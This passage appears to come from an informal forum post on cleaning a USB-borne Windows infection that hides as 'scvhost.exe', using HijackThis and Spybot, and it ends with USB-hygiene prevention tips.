2. Run the hijack this (rename it first or it wont start), and fix all files with scvhost.exe (not svchost.exe), run spybot, and then task manager fix. This should cure it. As u learn more about viruses, hijack this is probably the most useful program to have.
3. Reboot, and should run ok.

Prevention:

1. USB hygiene is paramount. Disable autorun (wont happen unless infection is cleared first) using administrative tools.
2. Do not run any program from the USB drive, copy paste on to computer first.
3. Scan USB drive all the times.
4. Format USB drive often.
5. Read about hakaglan on the web.